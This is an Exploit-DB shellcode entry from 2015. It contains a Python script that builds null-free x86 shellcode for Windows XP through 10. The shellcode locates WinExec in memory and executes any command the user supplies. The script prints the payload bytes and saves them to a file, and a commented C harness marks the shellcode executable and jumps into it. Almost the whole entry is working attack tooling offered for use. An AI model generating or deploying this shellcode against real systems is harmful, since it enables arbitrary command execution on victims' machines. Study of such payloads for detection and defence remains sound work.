Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator)

EDB-ID:

38959

Size:

0 bytes
EDB Verified:

Author:

B3mB4m

Type:

shellcode
Shellcode:   /  

Platform:

Generator

Published:

2015-12-13
  
#All Windows Null-Free WinExec Shellcode

"""
#Coded by B3mB4m
#Concat : b3mb4m@tuta.io
#Home   : b3mb4m.blogspot.com
#10.12.2015
Tested on : 
	Windows XP/SP3 x86
	Windows 7 Ultimate x64	
	Windows 8.1 Pro Build 9600 x64
	Windows 10 Home x64
-This shellcode NOT using GetProcAddress function-
-With this python script you can create ur own shellcode-
-This script belongs to shellsploit project-
-https://github.com/b3mb4m/Shellsploit-
"""



def WinExec( command, fill=None):
	from re import findall
	fill =  "31c9b957696e45eb0431c9eb0031c"
	fill += "031db31d231ff31f6648b7b308b7f0"
	fill += "c8b7f1c8b47088b77208b3f807e0c3"
	fill += "375f289c703783c8b577801c28b7a2"
	fill += "001c789dd81f957696e45753b8b34a"
	fill += "f01c645390e75f68b7a2401c7668b2"
	fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd"
	if len(command) == 4:
		stack = "%s" % (command.encode('hex'))
		data = findall("..?", stack)
		fill += "68"+"".join(data)
	else:
		if len(command)%4 == 3:
			padd = "\x20"
		elif len(command)%4 == 2:
			padd = "\x20"*2
		elif len(command)%4 == 1:
			padd = "\x20"*3
		else:
			padd = ""
		command = command + padd
		fixmesempai = findall('....?', command)
		for x in fixmesempai[::-1]:
			first = str(x[::-1].encode("hex"))
			second = findall("..?", first)[::-1]
			fill += "68"+"".join(second)
	fill += "89e2415152ffd7e886ffffff8b34af0"
	fill += "1c645813e4578697475f2817e045072"
	fill += "6f6375e98b7a2401c7668b2c6f8b7a1c"
	fill += "01c78b7caffc01c731c951ffd7"
	
	from random import randint
	name = str(randint(99999,99999999))+".txt"
	with open(name, "w") as exploit:
		exploit.write("\\x"+"\\x".join(findall("..?", fill)))
		exploit.close()

	print "\n\nLength : %s" % len(findall("..?", fill))
	print "File : %s\n" % name
	print "\n\\x"+"\\x".join(findall("..?", fill))


if __name__ == '__main__':
	from sys import argv
	if len(argv) < 2:
		print "\nUsage : python exploit.py 'command'\n"
	else:
		WinExec(argv[1])



"""
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <windows.h>
 
//gcc shell.c -o shell.exe
 
int main(void){
	char *shellcode = "SHELLCODE";
  	DWORD mypage;
  	BOOL ret = VirtualProtect (shellcode, strlen(shellcode),
    	PAGE_EXECUTE_READWRITE, &mypage);
 
  	if (!ret) {
    	printf ("VirtualProtect Failed ..\n");
    	return EXIT_FAILURE;}
  	printf("strlen(shellcode)=%d\n", strlen(shellcode));
  	((void (*)(void))shellcode)();
}
"""
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services